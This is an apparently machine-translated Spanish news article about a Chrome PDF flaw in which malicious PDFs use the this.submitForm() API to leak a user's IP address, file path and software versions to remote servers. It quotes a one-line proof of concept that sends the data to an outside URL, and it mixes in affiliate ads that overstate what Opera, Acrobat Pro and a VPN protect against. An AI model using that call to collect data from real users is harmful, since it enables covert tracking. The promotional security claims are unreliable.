El servicio de detección de vulnerabilidades EdgeSpot descubrió una intrigante vulnerabilidad de día cero de Chrome que explota documentos PDF.
La vulnerabilidad permite a los atacantes recopilar datos confidenciales utilizando documentos PDF maliciosos abiertos en Chrome..
Tan pronto como la víctima abre los respectivos archivos PDF en Google Chrome, un programa malicioso comienza a funcionar en segundo plano mediante la recopilación de datos del usuario..
Luego, los datos se envían al servidor remoto que está siendo controlado por los piratas informáticos. Es posible que se pregunte qué datos están siendo absorbidos por los atacantes, apuntan a los siguientes datos en su PC:
- dirección IP
- Ruta completa del archivo PDF en el sistema
- Versiones de SO y Chrome
Tenga cuidado con los archivos PDF plagados de malware
Los expertos detectaron que uno de los dos dominios readnotify [.] com o burpcollaborator [.] net estaba recibiendo los datos.
Revelaron que los atacantes están utilizando el this.submitForm () PDF Javascript API para recopilar la información sensible de los usuarios.
Lo probamos con un PoC mínimo, una simple llamada API como this.submitForm ('http://google.com/test') hará que Google Chrome envíe los datos personales a google.com.
Este error de Chrome estaba siendo explotado por dos conjuntos distintos de archivos PDF maliciosos, ambos circularon en octubre de 2017 y septiembre de 2018, respectivamente..
En particular, los atacantes pueden utilizar los datos recopilados para ajustar los ataques en el futuro. Los informes sugieren que el primer lote de archivos se compiló utilizando el servicio de seguimiento de PDF de ReadNotify.
Los usuarios pueden utilizar el servicio para realizar un seguimiento de las vistas de los usuarios. EdgeSpot no ha compartido ningún detalle sobre la naturaleza del segundo conjunto de archivos PDF.
Consejo rápido: cambie su navegador a Opera
En estos tiempos difíciles, somos atacados con malware, phishing y troyanos en cada paso, por lo que debemos estar mucho más atentos y estar protegidos..
Y como este es un problema específico de Chrome, puede evitar esa amenaza y todas las demás con un navegador orientado a la seguridad como Opera..
Este navegador viene con un bloqueador de anuncios incorporado que no solo elimina esas distracciones, sino que también bloquea los scripts de análisis, los píxeles de seguimiento y los métodos para recopilar sus datos..
Y si desea estar absolutamente seguro de mantenerse alejado de cualquier peligro, apueste por el servicio VPN integrado que es 100% gratuito por tiempo ilimitado..
Ópera
Opera ofrece la protección contra amenazas perfecta con el bloqueador de anuncios incorporado y el servicio VPN de forma gratuita! Consíguelo gratis Visita el sitio web¿Cómo puedo mantenerme protegido de las vulnerabilidades de PDF??
Descarga Adobe Acrobat PRO
Adobe y Chrome hacen una buena combinación cuando se trata de manejar archivos PDF. Al instalar Adobe Extension para Chrome, puede revisar y manipular archivos PDF a su gusto sin salir de su navegador favorito.
A pesar de su estructura robusta, es posible que el malware oculto en archivos PDF no se detecte si está utilizando la versión estándar del Reader.
Se recomienda la versión profesional para garantizar su protección y mantener sus datos alejados de los piratas informáticos..
Aunque no es gratis, el precio que pagará es bastante pequeño por la gran cantidad de funciones adicionales que disfrutará, incluida la seguridad mejorada de sus archivos PDF..
También se incluye una prueba gratuita de 7 días para que pueda probar la experiencia Pro completa antes de realizar la compra.
Adobe Acrobat PRO
Manténgase alejado del malware descargando Adobe Acrobat PRO. Tiene muchas más funciones que la versión gratuita y mantiene sus datos seguros. Prueba gratis Visite el sitio web Leer másEn caso de que desee estar seguro mientras navega por Internet, deberá obtener una herramienta totalmente dedicada para proteger su red.. Instale el acceso privado a Internet ahora y asegúrate. Protege su PC de ataques mientras navega, enmascara su dirección IP y bloquea todo acceso no deseado.
El servicio de detección de exploits EdgeSpot quería alertar a los usuarios de Chrome sobre los riesgos potenciales porque no se esperaba que el parche se lanzara en un futuro próximo..
EdgeSpot informó a Google sobre la vulnerabilidad el año pasado y la compañía prometió lanzar un parche a fines de abril..
Sin embargo, puede considerar el uso de una solución temporal al problema visualizando localmente los documentos PDF recibidos con otra aplicación de lectura..
Alternativamente, también puede abrir sus documentos PDF en Chrome desconectando sus sistemas de Internet.
Preguntas frecuentes: Obtenga más información sobre las extensiones de Chrome.
- ¿Funciona Privacy Badger con Chrome??
Sí lo hace. Pero si desea una selección más amplia, explore nuestras mejores opciones para las extensiones de privacidad de Chrome en esta guía completa.
- ¿Puedes editar archivos PDF en Chrome??
Hay muchas extensiones que permiten el procesamiento de archivos PDF. Consulte nuestra excelente guía sobre las mejores extensiones de PDF para Chrome.
- ¿Google tiene un generador de códigos QR??
No es así, pero puedes activarlo rápidamente. Aquí está nuestra guía completa sobre cómo habilitar el generador de códigos QR en Chrome.
Nota del editor: Esta publicación se publicó originalmente en abril de 2020 y desde entonces se ha renovado y actualizado en agosto de 2020 para brindar frescura, precisión y exhaustividad..
- La seguridad cibernética